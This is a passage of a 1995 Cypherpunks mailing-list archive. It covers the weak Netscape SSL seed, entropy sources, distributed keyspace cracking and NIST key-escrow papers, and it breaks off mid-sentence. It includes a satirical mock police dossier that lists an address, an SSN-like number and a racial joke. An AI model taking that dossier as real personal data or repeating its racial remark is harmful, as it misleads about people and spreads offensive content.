Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

Legion of Doom Kennedy Qaddafi security break North Korea DST

From reagle at rpcp.mit.edu Wed Sep 20 14:41:15 1995
From: reagle at rpcp.mit.edu (Joseph M. Reagle Jr.)
Date: Wed, 20 Sep 95 14:41:15 PDT
Subject: French Navy Security Compromised (Current by Shallow)
Message-ID: <9509202144.AA05842@rpcp.mit.edu>

Heard that a very large break from computer 'hackers' has taken place in France's navy. Information regarding ship-identification was stolen.

-------------------------
Regards,
Joseph M. Reagle Jr.
http://farnsworth.mit.edu/~reagle/home.html reagle at mit.edu 0C 69 D4 E8 F2 70 24 33 B4 5E 5E EC 35 E6 FB 88 From gnu at toad.com Wed Sep 20 14:50:21 1995 From: gnu at toad.com (John Gilmore) Date: Wed, 20 Sep 95 14:50:21 PDT Subject: Project: a standard cell random number generator Message-ID: <9509202150.AA08164@toad.com> Software-generated random numbers are likely to be of poor quality. There just isn't that much true randomness visible to computers. Several ways to build good hardware random number generators are known. But before hardware random number generators can be incorporated into common desktop computers, someone will have to put them into a small fraction of a chip. Currently, random number generators are chips or larger circuits. Nobody will pay to put these on a motherboard. But if a random number generating circuit occupied 1/1000th of a CPU chip or "multi-function I/O" chip, cost would not be a reason to leave it out. You probably can't build a hardware random number generator out of existing "gate array" gates or "standard cell" cells, because all the existing gates and cells are designed to behave completely predictably! It will take designing a new circuit structure. Do we know any solid state physics / circuit design experts who think this might be a fun thing to do? I bet you could get a paper out of it. And probably improve the world a few years later, when companies used your paper to close another hole in their computer security. John PS: It's possible that NSA collusion with chip-makers could produce bad pseudo-random-number generators in popular chips, giving NSA a back-door into any algorithm that used them. This would be harder to detect than poor software random number generators, since it requires prying the lid off the chip, getting out your microscope, and reverse-engineering the circuit, instead of just disassembling the software. 
In this sense, NSA ought to be *encouraging* Intel and IBM and Motorola to put "generate random bits" instructions into their instruction sets...

From iagoldbe at csclub.uwaterloo.ca Wed Sep 20 14:56:33 1995
From: iagoldbe at csclub.uwaterloo.ca (Ian Goldberg)
Date: Wed, 20 Sep 95 14:56:33 PDT
Subject: netscape's response
In-Reply-To: <199509200812.BAA17876@infinity.c2.org>
Message-ID: <43q2l8$l10@calum.csclub.uwaterloo.ca>

In article <9509200248.ZM206 at tofuhut>, Jeff Weinstein wrote:
>On Sep 20, 1:12am, sameer wrote:
>> Is UNIX really the most vulnerable? How many bits did the
>> tickcount account for? Seems to me that guessing just time & tick
>> would be easier than guessing time, pid and ppid if you are not logged
>> into the machine in question. . .
>
> This is really dependent on how long Windows has been running. If you
>boot windows and immediately start an ssl connection, then the number
>will be pretty low, but if you don't make the first SSL connection until
>later, it should get better. I think an hour would get you around 16-bits,
>but this is just a guesstimate on my part. If you leave your machine
>running windows for days you will get close to 32bits.
>

But you don't have the usec at all, if I read your post correctly. Windoze uses the time in seconds (essentially 0 bits of randomness, maybe a couple, since Windoze machines don't set their clocks very well), and the tick count. In one hour, the tick count counts to 3600*1000, or about 22 bits. Many hours give another bit or two. Thus, in total, given *no* information except the assumption that the clock is reasonably accurate, you get at *most* 25 bits. Since our code can do 21 bits in 1 minute, we'll need 16 minutes.

- Ian

From sameer at c2.org Wed Sep 20 15:05:31 1995
From: sameer at c2.org (sameer)
Date: Wed, 20 Sep 95 15:05:31 PDT
Subject: netscape will release code?
Message-ID: <199509202200.PAA03146@infinity.c2.org> I just spoke with a reporter from the sfchronicle who told me that when she talked to Netscape they said that they would be releasing parts of their source code to the net. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From stewarts at ix.netcom.com Wed Sep 20 15:15:34 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Wed, 20 Sep 95 15:15:34 PDT Subject: netscape's response Message-ID: <199509202215.PAA14101@ix.ix.netcom.com> On Sep 20, 12:29am, Christian Wettergren wrote: >> Subject: Re: netscape's response >> One wild idea that I just got was to have servers and clients exchange >> random numbers (not seeds of course), in a kind of chaining way. Since >> most viewers connect to a number of servers, and all servers are >> connected to by many clients, they would mix "randomness sources" with >> each other, making it impossible to observe the local environment >> only. And the random values would of course be encrypted under the >> session key, making it impossible to "watch the wire". Be _very_ careful with this approach - it's the kind of thing that a rogue server or client might abuse to find out randomness or other state information about the clients or servers connecting to it. At minimum, only give out some of your randomness, XORed with some arbitrary value to scramble the range and then hashed before sending, so that the recipient can't find out the values you're using. One valuable technique is to continually accumulate any randomness available, rather than just going for what's available right when you need it. However, one source of right-when-you-need-it randomness to contribute to session keys is hashing the plaintext, or at least the first chunk of it; if you use this carefully (e.g. 
by throwing it in with the rest of your hash input), it should provide input unavailable to the attacker. Also, while network boards and sound cards can provide useful randomness, you can't depend on their existence, at least in the PC world; most home users probably connect over modems and don't have LANs. So any software that would like to use these needs to include methods of detecting their existence before trying to get data from them. (Suns obviously all have network interfaces, and Sparcstations have /dev/audio, but not all Unix boxes are similarly equipped.) #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From iagoldbe at csclub.uwaterloo.ca Wed Sep 20 15:19:12 1995 From: iagoldbe at csclub.uwaterloo.ca (Ian Goldberg) Date: Wed, 20 Sep 95 15:19:12 PDT Subject: Please send me SSL problems... In-Reply-To: <199509201004.DAA23933@ammodump.mcom.com> Message-ID: <43q40a$q8a@calum.csclub.uwaterloo.ca> In article <199509201004.DAA23933 at ammodump.mcom.com>, Jeff Weinstein wrote: > > I'd just like to let all cypherpunks know that I'm really interested in >getting any feedback you might have about security problems with Netscape >products. I'm particularly interested in bugs in the our implementation >of SSL, and problems in the protocol that are not addressed in SSL 3.0. Well, if you'd release Netscape source, we could check its implementation... :-) - Ian From perry at piermont.com Wed Sep 20 15:27:51 1995 From: perry at piermont.com (Perry E. Metzger) Date: Wed, 20 Sep 95 15:27:51 PDT Subject: Project: a standard cell random number generator In-Reply-To: <9509202150.AA08164@toad.com> Message-ID: <199509202227.SAA05667@frankenstein.piermont.com> On this same track, I suggest that "/dev/random" devices for unix are an excellent idea. Ted Tso did one for Linux that steals all the bits of semi-random timing information it can. 
Such a driver has the feature that it can be plugged into either a software pseudodriver or a hardware device if one is available. John Gilmore writes: > Do we know any solid state physics / circuit design experts who think > this might be a fun thing to do? I bet you could get a paper out of > it. And probably improve the world a few years later, when companies > used your paper to close another hole in their computer security. There are companies that sell hardware RNGs -- Newbridge, for instance -- but they charge an arm and a leg for them. There is also a company that I got literature from that sells RS232 interfaceable radiation detectors, which I have thought about using for this purpose, but they are also way too expensive. As you say, what one really needs is something that fits in a small section of a chip. Unfortunately, this stuff is very delicate analog -- not the usual thing you find in standard cell -- and very easy to screw up. > PS: It's possible that NSA collusion with chip-makers could produce > bad pseudo-random-number generators in popular chips, giving NSA a > back-door into any algorithm that used them. This would be harder to > detect than poor software random number generators, since it requires > prying the lid off the chip, getting out your microscope, and > reverse-engineering the circuit, instead of just disassembling the > software. In this sense, NSA ought to be *encouraging* Intel and > IBM and Motorola to put "generate random bits" instructions into > their instruction sets... An interesting concept! Perry From karlton at netscape.com Wed Sep 20 15:28:22 1995 From: karlton at netscape.com (Phil Karlton) Date: Wed, 20 Sep 95 15:28:22 PDT Subject: "random" number seeds vs. Netscape In-Reply-To: <199509202101.RAA05534@frankenstein.piermont.com> Message-ID: <30609562.15FB@netscape.com> Perry E. Metzger wrote: > This is true. 
> However, you must get 128 bits of entropy into the MD5
> -- this can be accompanied by as much junk as you like, but if there
> are at least 128 bits of entropy fed in, the MD5 process will distil
> it into what you want.

My assumption was that if we conservatively counted at least 300 bits of entropy, we would have 128 for sure. Not very scientific.

> You might want to read RFC 1750,

Did that. It talks about a lot of the pitfalls. Unfortunately it does not address (nor can it realistically be expected to address) details of what to look for on a particular version of an OS running on some particular platform.

> and examine the code PGP uses for
> doing its random generation. Clients do lots of fairly random things
> while talking to netscape (click and keyboard press times, etc.) that
> can be incorporated in, along with other sources of bits. You should
> grab bits wherever you can and keep them for when you need them, as
> getting 128 bits takes a while.

Gee, I thought I pointed out that we were putting that code in as part of the going idle.

> PC timers inherently run at MHz speed -- they interrupt every 100th of
> a second but you can get finer resolution by querying the clock
> chip. Does Windows let you do this?

I don't know, but I'll forward this on to our PC guys. It might be a portability problem.

> I wouldn't do that, since it forces you to have a dependency on
> executing a subprocess.

We try to be careful about dealing with the subprocess failing to run.

> Were I you, I'd capture the timer on every single keystroke and mouse
> click event and feed that into your entropy generator a la PGP.

We are constantly trying to improve this area of our code. We are still taking suggestions.

By the way, the security engineers are doing what we can to make sure that we can expose as much of the seed generation algorithms as possible. There is a chance we can get permission to post the code.

> > System specific info such as hardware serial number or
> > system id.
> By definition, that isn't random. Don't use it.

It doesn't hurt. It's also information that is not available to the external eavesdropper. Other than execution time, why should I remove it from the list of bits being fed into the hash? Successfully getting this information probably involves physical access to the machine.

> There are other things you can mix in, besides keystroke and mouse
> timings and positions, like system call timings for things that might
> take a bit of time.

We will check this one out also. For the really low resolution clocks, the answer will be zero most of the time. :-)

> > Multi-user Unix machines present a special problem. There are those
> > at Netscape that argue that anybody who has login access to your
> > machine may as well be considered to have root access. There are
> > enough known attacks that this is true to a large extent. However,
> > I think we can do better than just giving up.
>
> I agree. Don't run on the assumption that everyone has root --
> otherwise you'll build something that produces less safety than it could.

I agree, but I have a hard time arguing with those that assert that the security of UNIX is weak enough that given what we are doing for the patch it will be easier to become root from a logged in account than to hack the seed.

PK
--
Philip L. Karlton                       karlton at netscape.com
Principal Curmudgeon                    http://www.netscape.com/people/karlton
Netscape Communications Corporation

From perry at piermont.com Wed Sep 20 15:41:55 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Wed, 20 Sep 95 15:41:55 PDT
Subject: "random" number seeds vs. Netscape
In-Reply-To: <30609562.15FB@netscape.com>
Message-ID: <199509202240.SAA05690@frankenstein.piermont.com>

Phil Karlton writes:
> Perry E. Metzger wrote:
> > This is true.
> > However, you must get 128 bits of entropy into the MD5
> > -- this can be accompanied by as much junk as you like, but if there
> > are at least 128 bits of entropy fed in, the MD5 process will distil
> > it into what you want.
>
> My assumption was that if we conservatively counted at least 300 bits
> of entropy, we would have 128 for sure. Not very scientific.

It's not a bad way to go. You have to make sure that you have at least that many bits of ENTROPY, however. Stuff like keystroke timings should only be thought of as handing you a bit or so per click.

> > You might want to read RFC 1750,
>
> Did that. It talks about a lot of the pitfalls. Unfortunately it
> does not address (nor can it realistically be expected to address)
> details of what to look for on a particular version of an OS running
> on some particular platform.

That is true.

> > PC timers inherently run at MHz speed -- they interrupt every 100th of
> > a second but you can get finer resolution by querying the clock
> > chip. Does Windows let you do this?
>
> I don't know, but I'll forward this on to our PC guys. It might be a
> portability problem.

It actually shouldn't be -- every PC has the same timer chip or a compatible one. The real question is whether Windows lets you get the data out.

> > I wouldn't do that, since it forces you to have a dependency on
> > executing a subprocess.
>
> We try to be careful about dealing with the subprocess failing to run.

Also be especially careful about how you run the thing! Don't use popen or anything like it!

> > > System specific info such as hardware serial number or
> > > system id.
>
> > By definition, that isn't random. Don't use it.
>
> It doesn't hurt. It's also information that is not available to the external
> eavesdropper. Other than execution time, why should I remove it from the list
> of bits being fed into the hash?

You have to build to the model of someone who knows everything there is to know about the machine. Why?
Well, many pieces of information can in fact be extracted -- license servers and SNMP agents are a way to extract things like system IDs. (Overly chatty SNMP extensions and similar stuff make me nervous about using too much ps based entropy, by the by.)

If you put PROM ID into the hash, don't count it as a source of bits -- just think of it as something extra to throw in to make life harder -- and heavily comment that it is not to be counted in the magic 300 bits you are trying to extract.

Remember, plan for the worst, not the best, and you will never have trouble if the threat model gets worse. As a security consultant, I always emphasize to clients that you have to plan for worst case -- always. That way you can sleep at night. Always assume the adversary has a way to break the individual components of your system.

When I build firewalls, I rig them so that both an outer filtering router, a tightened down application gateway, and an inner filtering router must all fail in order for people to break in. I build things on the assumption of maximum hostility on all points. Because of this, every time a security hole has been announced for the last couple of years -- in CISCO firmware, in Sendmail, in anything -- I've been able to sleep because I've known that only one of many layers of protection has been breached and I have a few hours to fix the one layer that is broken.

When building things like this, BUILD PARANOID. It never hurts.

> > > Multi-user Unix machines present a special problem. There are those
> > > at Netscape that argue that anybody who has login access to your
> > > machine may as well be considered to have root access. There are
> > > enough known attacks that this is true to a large extent. However,
> > > I think we can do better than just giving up.
> >
> > I agree. Don't run on the assumption that everyone has root --
> > otherwise you'll build something that produces less safety than it could.
>
> I agree, but I have a hard time arguing with those that assert that the security
> of UNIX is weak enough that given what we are doing for the patch it will
> be easier to become root from a logged in account than to hack the seed.

Always build belt-and-suspenders around any security system. Try to make sure that there are as many ways as possible that things have to fail before you get nuked. Throwing an impediment in the way of non-root users is a good idea. You program it once and it protects forever -- an excellent investment.

Perry

From jordan at Heuristicrat.COM Wed Sep 20 15:47:32 1995
From: jordan at Heuristicrat.COM (Jordan M. Hayes)
Date: Wed, 20 Sep 95 15:47:32 PDT
Subject: RSA Prevails In Arbitration Against Cylink
Message-ID: <9509202241.AA00756@euclid.Heuristicrat.COM>

From baldwin at RSA.COM Wed Sep 20 09:09:30 1995

Here's an article on the RSA-Cylink arbitration from the business wire.

[ ... elided -JMH ]

Just a note for those who aren't aware, Business Wire is a pay-per-use "news release" service. That is, RSA wrote the contents of what Bob (Hi!) posted. The clue is at the bottom of the "story":

CONTACT: RSA Kurt Stammberger, 415/595-8782 kurt at rsa.com

This is not to say anything pro or con about the content of the press release; just that it wasn't written by a third party.

/jordan

From abostick at netcom.com Wed Sep 20 15:51:07 1995
From: abostick at netcom.com (Alan Bostick)
Date: Wed, 20 Sep 95 15:51:07 PDT
Subject: USA Today on Fear of Credit Cards over Net
In-Reply-To: <199509201518.LAA78249@tequesta.gate.net>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

In article <199509201518.LAA78249 at tequesta.gate.net>, liberty at gate.net (Jim Ray) wrote:

> Pity they didn't ask about, "Tossing a credit card slip/carbon
> in the garbage." Dumpster-diving is still an effective, lo-tech
> attack.

Why worry about dumpster-diving?
Even credit card receipts on carbonless NCR paper are prey to the hungry eyes of underpaid cashiers or the waiter who doesn't think you wrote in a big enough tip. A security scheme is no stronger than its weakest link. Even with the attack Goldberg and Wagner discovered on Netscape SSL, the weakest link in credit card transactions lies elsewhere. I find it curious that USA TODAY didn't include over-the-counter credit card transactions in its poll. Alan Bostick | Seeking opportunity to | If you don't like what you read in the news, develop multimedia content. | go out and make some of your own. Finger abostick at netcom.com | Scoop Nisker for more info and PGP public key -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQB1AgUBMGCYtOVevBgtmhnpAQF6RgL/XrkCJe6v5v6rtUmWTgB27tSmcTTkoeGj CXEQwDw5eHcxe0jfne/r2Y9wSkRZtb4psKIhwLDd3BxxuWhzdrhVcaTcInUV+gGo t4i2Td883rejgqlA4xbPWcWtd5NPSC7U =pi8V -----END PGP SIGNATURE----- From cjl at welchlink.welch.jhu.edu Wed Sep 20 16:04:59 1995 From: cjl at welchlink.welch.jhu.edu (cjl) Date: Wed, 20 Sep 95 16:04:59 PDT Subject: SCIENCE magazine on computers Message-ID: The Sept * issue of SCIENCE magazine has a special section on computers of particular C-punk interest are articles on the rise of symmetric multiprocessor solutions to supercomputer needs and a piece on the future of computing discussing quantum dots, quantum computing, holographic association, optical computers, and DNA computers. SCIENCE vol. 269 pages 1354-1385 C. J. Leonard ( / "DNA is groovy" \ / - Watson & Crick / \ <-- major groove ( \ Finger for public key \ ) Strong-arm for secret key / <-- minor groove Thumb-screws for pass-phrase / ) From m5 at dev.tivoli.com Wed Sep 20 16:10:23 1995 From: m5 at dev.tivoli.com (Mike McNally) Date: Wed, 20 Sep 95 16:10:23 PDT Subject: software In-Reply-To: <013.01607783.LFWS37A@prodigy.com> Message-ID: <9509202310.AA12270@alpha> MR STEVE R. KELL writes: > I need new crypt software w/instruction if possible. 
My favorite cypherpunks mail so far. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) | | stand there and flap your arms like a fish. | Tivoli Systems, Austin TX | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From tcmay at got.net Wed Sep 20 16:25:01 1995 From: tcmay at got.net (Tcmay@got.net) Date: Wed, 20 Sep 95 16:25:01 PDT Subject: CLAIMING CHUNKS OF KEYSPACE... Message-ID: <9509201546165270@ci.diamond-bar.ca.us> Date: Mon, 28 Aug 1995 23:02:01 -0700 To: cypherpunks at toad.com From: tcmay at got.net (Timothy C. May) Subject: Claiming chunks of keyspace... Looking at it from the outside, I thought the latest SSL challenge experiences were highly instructive. Nothing to be ashamed of. An interesting question: Is it a valid approach for J. Random User to "claim" some chunk of keyspace to search? If the "reward" of finding the gold buried in the keyspace (a key that meets the challenge) is high and the cost of claiming the keyspace is low (or nil), then game theory tells us that some folks will be tempted to claim a bigger chunk of keyspace than they can possibly process. What can be done to reduce this effect? On the negative side, ostracize or punish those who bite off more than they can chew. This approach is fraught with dangers. On the positive side, let everyone simply attack the keyspace as they see fit, picking random parts to attack. This should not be "worse" than a factor of several from a "perfectly coordinated" attack. (I haven't spent time calculating this, but my intuition is that a random attack, with overlapping keyspace, is not a lot less efficiently attacked than attempting to arrange for no overlaps...just based on my mental picture of dropping line segments randomly on some interval and figuring coverage of the line segment.) 
In between, market systems where intermediate agents subcontract out chunks of keyspace. Mechanisms for this are lacking.

-Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA | knowledge, reputations, information markets,
Higher Power: 2^756839 | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From tcmay at got.net Wed Sep 20 16:25:17 1995
From: tcmay at got.net (Tcmay@got.net)
Date: Wed, 20 Sep 95 16:25:17 PDT
Subject: "CITIZEN-UNIT IDENTIFICATION" A RED HERRING
Message-ID: <9509201546155269@ci.diamond-bar.ca.us>

Date: Mon, 28 Aug 1995 21:44:12 -0700
To: cypherpunks at toad.com
From: tcmay at got.net (Timothy C. May)
Subject: "Citizen-Unit Identification" a Red Herring

All this paranoid talk about the dangers of thumbprints on ID cards, about driver's licenses, and about magstripes got me to thinking. So, I accessed my NLETS (National Law Enforcement Telecommunications System) and downloaded my own record:

Citizen-Unit ASCII Name: "Timothy Christopher May" NLETS Actual Name: G0Yj34C1qm92H7u Known Aliases: "Klaus!
von Future Prime," "Lance," "Nick Szabo" Residence: 427 Allan Lane, Corralitos, CA 95075 Driver's License: N4197484 SSN: 227-80-5823 Passport Number: H673qop90 Race: Aryan Origin: Europe Hair: Brown Eyes: Blue Weight: 210 pounds (10/94, recorded at SFO) Known associations: Anarchist Alliance, Young Students for Discordianism, Vernor Vinge Fan Club, Information Liberation Front Magazines Subscribed To: Newsweek, Playboy, The Economist, MacWeek, Anarchy Today, Liberty, FertilizerWorld, Reason, MacUser, NewtonGazette, Bay Aryan Events, Information Week Consumer Preferences: beer (+++), wine (+), cigarettes (-) Electricity Patterns: consistent with either marijuana cultivation or heavy Net usage, or both Threat level: Class 3 Security Threat I don't see what the big deal is. The NLETS record implies I'm some kind of security threat, but also correctly notes that I'm an Aryan, so I guess I'm safe. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From vznuri at netcom.com Wed Sep 20 16:25:29 1995 From: vznuri at netcom.com (Vznuri@netcom.com) Date: Wed, 20 Sep 95 16:25:29 PDT Subject: SSL keyspace etc. Message-ID: <9509201546195281@ci.diamond-bar.ca.us> Date: Tue, 29 Aug 95 12:40:08 -0700 From: "Vladimir Z. Nuri" regarding SSL challenge, I am not following this close enough to understand completely, but I thought I would offer a few suggestions for tweaking the code: -- the issue of grabbing keyspace has been raised. what if someone malicious just yanked huge areas of keyspace and didn't search them? 
it seems that the clients need to return to the server some evidence that they have searched their keyspace in question. the server could verify this evidence. for those that don't return the "evidence", that keyspace could be reallocated to other comers. the simple approach to all this, if you don't have "evidence", is to just have the server keep reallocating the same space over and over to different crackers. hopefully eventually every part of the keyspace would be allocated to a "legitimate" worker.

-- the issue of efficiency is very fascinating for this project. essentially the server has no idea what the block size of key blocks it should dole out. obviously the server would want to try to dole out equal *processing chunks* such that the remote machine reports back in a certain amount of time, no matter what architecture. the problem of course is that remote machines all have different efficiency. two possibilities: a sort of "bogomip" calculation is done in the client, and its processor speed is reported to the server. the server uses this in a calculation to determine how much to dole out. it could try to derive a best fit linear relationship between space covered and processor speed, or build up a table of results and interpolate for new requests. note that the efficiency issue also ties into "what if people take keys they don't solve". if the server knows roughly how long a client should take to report back, and it never reports back, it could then reallocate that key space.

-- another problem of efficiency is that the server is clearly a bottleneck for servicing requests. the question arises: suppose that the server could determine the precise interval between which machines would go back to it for new keys. what is the optimum interval over the whole project?
in other words, given the number of machines participating, and their processor speeds, what size of key space should be parceled out to the next request so that the bottleneck at the server is minimized? this optimum interval must be very hard to derive, because it depends on the contention based on many incoming connections. it would involve some probabilistic approximations of the likelihood of collisions. to model it, you might consider a request as taking [n] seconds of time, and consider that if any two requests are in contention, a retry happens after [m] seconds. you could build up models that would try to minimize the time based on empirical simulations. however I would be exceedingly impressed if someone could derive a formula for this, or give it from some textbook.

-- adaptive algorithms for all these situations are possible. the server could use a "hypothesis" in the sense of partitioning out a starting size of keyspace, and then watch how long it took the client machine to respond and then assume a linear relationship or something to compute the size of the next keyspace to hand out to the machine. the server could continually watch how closely its "hypothesis" (i.e. its estimations of how long a given machine will take) match the actual returns.

-- more on the idea of evidence: we are working with a hashing algorithm, right? as evidence the client machines could return checksums of all the hashes of all the keyspace it searched. it could break up its own search space into blocks and return the checksums on the hashes for each block. the server, if it wanted to, could verify these blocks running its own computations. if it ever found a client was "unreliable", it could then diminish the keys sent to the unreliable client, or even send it areas of search space it didn't care about anymore (i.e. areas that have already been confirmed searched by a more "reliable" client).
-- in fact all this reminds me of the process of intelligence gathering by an agency, which could be formalized as follows: suppose that the agency wishes to identify "quality information". it has a set of sources, A,B,C,D.... now, it can send questions out to these sources and get information from them. some of them however would be "unreliable". the agency must devise some means by which it can weed out the unreliable sources. note that this may even involve sending them bogus instructions to keep them busy so they do not themselves suspect they have been "discovered" and then change their defective plans. obviously, one of the most important intelligence tools in this matter is that of *correlation*. you have to determine "truth" (or "quality information") via the correlation between answers that the different sources give you. also important to correlation is *redundancy*. you sometimes have to ask more than one source the same question, and test the answer. in this model, if A and B give different answers, you know that one of A or B is "unreliable". what is very interesting in our case of cracking keys is that the server can verify the information on its own. in other words, it has a *control* that it knows is correct that it can judge against the answers "out there". unfortunately, in contrast, real intelligence agencies are not always privy to this kind of certain "control" and in fact have to determine "truth" entirely from a set of sources, any of which might be unreliable. in this case one has to have a hypothesis about what is the "truth" and test it to see if it holds up consistently with all information. the approaches of attackers are obvious. the most obvious is that of collusion and infiltration. but I will save the rest for some NSA spook to elaborate. there are certainly enough colluding and infiltrating on this list -- one of the reasons all this interests me is that it really reminds me of some projects I have worked on in the past. 
in high school I wrote a network mandelbrot set program (client/host). the issue of contention arose and it appeared to me to look like an upside-down parabola after I plotted some points (curving up, that is). i.e. the optimum was at the pit of the parabola, and when too few or too many requests happened, the speed over the overall simulation was increased above the optimum. some very ingenious readers may actually be able to locate this code, which I put in the public domain over 5 years ago.

-- another thing I worked on was trying to find the optimal block size of communications protocols such as Zmodem, which generally instead just pick arbitrary block sizes 2^n. I actually was able to attack this problem analytically through the observations of the properties of infinite series and calculus techniques. it is a similar problem but the idea of contention really complicates this issue. (for what I studied, there was only one client and one server, so to speak). I still have this paper in Latex format and if anyone is interested I would be happy to send it to you. it's a really nice example, IMHO, of how if you use your brain and some mathematics, you can really get a far more elegant approach than brute force, and know with much greater certainty that what you are doing makes sense mathematically. an awful lot of programmers just tend to bang on the keyboard without thinking of the theoretical implications of their work. this is understandable given that the theoretical implications of even trivial programs (such as the SSL client/server interactions) can be mathematically extremely daunting, requiring even differential equations to model fairly simple pieces of code.

-- well, that is my contribution of the moment into the cypherpunk annals. one never knows what a little combination of boredom and inspiration can lead to.
--V.Z.Nuri

From alano at teleport.com Wed Sep 20 16:25:31 1995
From: alano at teleport.com (Alano@teleport.com)
Date: Wed, 20 Sep 95 16:25:31 PDT
Subject: FLORIDA DRIVERS PERMITS AND A HELLO
Message-ID: <9509201546185279@ci.diamond-bar.ca.us>

Date: Tue, 29 Aug 1995 12:06:42 -0700
To: cypherpunks at toad.com
From: Alan Olsen
Subject: Re: Florida Drivers Permits and a Hello

At 01:47 PM 8/29/95 -0500, you wrote:
>Alan Olsen writes
>>They would not have to include an entire thumbprint. The actual code used
>>to verify fingerprints is not very large. All that would be needed is
>>enough information to ID into the "official" records and enough checksum
>>type information to prevent alteration/counterfeiting. Using magnetic media
>>for this is a bit foolish as it can be changed/destroyed with the stroke of
>>a magnet. I will not say by what means I would think should suit as a
>>better encoding scheme because: 1) They are not using it and 2) I do not
>>want to give them any ideas.
>
>What possible value could the LEAs get by having your thumbprint digitally
>encoded on your driver's license? It's not like the average cop-on-the-beat
>is qualified to lift a fingerprint and compare it. Even if he was, how
>does it benefit that the fingerprint is on the license?
>
>This seems silly.

I was pointing out that it was possible. I was not trying to make the point that there was any *USE* for such a thing. (Evidently some ID cards now carry such prints. California does, if memory serves me correctly.) Just because something is silly does not mean it will not be tried by someone in law enforcement. In fact, there seems to be a correlation between silly acts and law enforcement... (Or at least those making the rules about law enforcement.) And if you think it cannot get any worse, Pete "I want to seal the borders" Wilson has announced he is running for president.
We will be getting a large number of silly laws and pronouncements if the American people are stupid enough to elect him to high office. > > | Visualize whirled keys! | alano at teleport.com | |"The moral PGP Diffie taught Zimmerman unites | Disclaimer: | |all mankind free in one-key-stenography-privacy!"| Ignore the man | | -- PGP 2.6.2 key available on request -- | behind the keyboard.| | http://www.teleport.com/~alano | | From remailer at flame.alias.net Wed Sep 20 16:26:53 1995 From: remailer at flame.alias.net (Remailer@flame.alias.net) Date: Wed, 20 Sep 95 16:26:53 PDT Subject: NIST KEY ESCROW MEETING Message-ID: <9509201546255317@ci.diamond-bar.ca.us> Date: Wed, 30 Aug 1995 07:51:07 +0200 To: cypherpunks at toad.com From: Flame Remailer Subject: NIST Key Escrow meeting Subject: NIST Key Escrow Meeting Discussion Papers Key Escrow Issues Meeting, September 6-7, 1995 Discussion Paper #1 Issues -- Export of Software Key Escrowed Encryption On August 17, 1995, the Administration announced its proposal to permit the ready export of software encryption provided that the products use algorithms with key space that does not exceed 64 bits and the key(s) required to decrypt messages/files are escrowed with approved escrow agents. Under the proposal, products will be reviewed to verify that they satisfy the criteria and, if so, they will be transferred to the Commodity Control List administered by the Department of Commerce where the products can be exported under a general license (in much the same way that 40-bit RC2/RC4 encryption is licensed today). We are working toward creating broadly stated criteria that are in the nature of performance specifications. To meet these criteria, encryption products will need to implement key escrow mechanisms that cannot be readily altered or bypassed so as to defeat the purposes of key escrowing. 
The criteria, when finalized and published, will state the objectives, but not the exact technical method(s), by which those objectives are satisfied. This is to provide software publishers the flexibility to design methods for meeting our stated objectives in a manner that is compatible with the design of their products. There are, therefore, a number of questions we must work together to answer in order to draft effective criteria. These questions are: * Avoiding multiple encryption -- How can the product be designed so as to prevent doubling (or tripling, etc.) the key space of the algorithm? * Disabling the key escrow mechanism -- How can products be made resistant to alteration that would disable or circumvent the key escrow mechanism? How can the "static patch" problem be avoided? How can this be tested? * Access to escrow information -- What mechanisms must be designed into encryption products to allow authorized access to escrowed keys? This likely includes the identity of the key escrow agent(s) and a serial number for the key escrow agent to use to identify the key(s)/component(s) necessary to decrypt the message. What other information will be necessary to be provided to the escrow agent to identify the necessary key(s)/component(s)? Are there other comparable viable approaches? * Non-escrowed use -- How can products be made so that they do not function with non-escrowed products (or tampered escrowed products)? How can this be tested? * Limiting surveillance -- How can products be designed so that information both sent and received by the user can be decrypted without release of keys of other users? * Practical Key Access -- How can mechanisms be designed so that repeated involvement of escrow agents is not required for decryption for multiple files/messages during the specified access period? * Assurance that keys are escrowed -- How can it be assured that key escrow products are indeed satisfactorily escrowed? 
For example, products could be required to be escrowed at time of manufacture or be made inoperable until properly escrowed. * Ability to re-escrow keys -- How can products be designed so that new keys can be escrowed at the user's discretion with a U.S. Government approved escrow agent? * Certified escrow agents -- Can products be designed so that only escrow agents certified by the U.S. government (domestic, or under suitable arrangements, foreign) are utilized? What should be the criteria for an acceptable U.S. escrow agent? -------------- With your input, we are hopeful that this effort will lead to definitive criteria, which will facilitate the development of exportable products and help minimize the time required to obtain export licenses. The Administration seeks to finalize such criteria and make formal conforming modifications to the export regulations before the end of 1995. Note: These issues will be discussed at the Key Escrow Issues Meeting to be held September 6-7, 1995 (9:00 a.m. - 5:00 p.m.) at the National Institute of Standards and Technology (Gaithersburg, Maryland). The meeting will be open to the public, although seating is limited. Advance registration is requested, please contact Arlene Carlton on 301/975-3240, fax: 301/948-1784 or e- mail: carlton at micf.nist.gov. 8/25/94 ----------------------------- Key Escrow Issues Meeting, September 6-7, 1995 Discussion Paper #2 Discussion Issues: Desirable Characteristics for Key Escrow Agents In the government's recent announcement of its intent to allow the export of 64-bit software key escrow encryption products, one stipulation was that the keys would be escrowed with an approved key escrow agent.(*1) Exactly what 